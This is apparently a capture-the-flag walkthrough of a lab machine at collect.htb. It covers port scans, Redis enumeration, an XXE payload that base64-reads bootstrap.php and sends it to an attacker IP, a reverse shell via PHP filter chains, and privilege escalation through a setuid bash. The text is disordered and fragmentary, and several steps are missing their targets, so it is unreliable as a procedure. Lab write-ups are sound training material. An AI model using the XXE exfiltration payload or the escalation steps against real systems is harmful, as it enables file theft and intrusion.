# Ports
Open 10.10.11.192:22
Open 10.10.11.192:80
Open 10.10.11.192:6379
# Services
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Home
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
6379/tcp open redis syn-ack ttl 63 Redis key-value store
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80
Checking the website will reveal the real hostname collect.htb
We'll add it to /etc/hosts for further enumeration
Port 6379
Nothing interesting because we aren't authenticated
redis-cli -h collect.htb
collect.htb:6379> info
NOAUTH Authentication required.
(1.62s)
After some try and error we are able to read files . Check bootstrap.php to receive the redis password!
xxe.dtd
Do it for index.php to get an overview and than check bootstrap.php which is mentioned in index.php
While poking around we also discovered /var/www/developers/.htpasswd
<!ENTITY % file SYSTEM 'php://filter/convert.base64-encode/resource=../bootstrap.php'>
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://10.10.16.28/?file=%file;'>">
%eval;
%exfiltrate;
root 975 0.0 1.0 265400 40792 ? Ss Dec12 0:09 php-fpm: master process (/etc/php/8.1/fpm/php-fpm.conf)
victor 1115 0.0 0.5 265840 20640 ? S Dec12 0:00 php-fpm: pool victor
victor 1116 0.0 0.4 265840 19400 ? S Dec12 0:00 php-fpm: pool victor
Once we have a shell as victor we start to enumerate the box again.
Enumeration
Seems like we can access the pollution_api source code
cd ~
ls /
Desktop Documents Downloads Music Pictures Public Templates Videos pollution_api user.txt
cd pollution_api
ls
controllers functions index.js log.sh logs models node_modules package-lock.json package.json routes
Check for any processes that are related to our api
ps aux | grep api
root 1347 0.0 1.9 1664540 76956 ? Sl Dec12 0:01 /usr/bin/node /root/pollution_api/index.js
ls -al /usr/bin/bash
-rwsr-sr-x 1 root root 1234376 Mar 27 2022 /usr/bin/bash
Root
We're now root and get the last flag in /root
Last updated
Seems to be a a forum for members of collect.htb where they are able to ask questions and get help
First let's register an account at
Victor(a Dev) has trouble accessing the pollution api. Attachment contains environment infos
Kubernetes?
John responsible for developers.collect.htb?
Once we downloaded the attachment of we discovered it's a burp history file.
Register an account on and capture the requests in burp
Use the previously discovered token to elevate our privileges
Open in your browser, register a new API User and capture the request
The parameter ?page is vulnerable to remote code execution using filter chains. We will use this project to get an reverse shell on the system :)
We'll use script to escalate our privileges to user "victor"
/home/victor/pollution_api/controllers/Messages_send.js
While parsing through the source code we can spot a possible vulnerability
But checking the code will tell us that we need admin permissions on the api.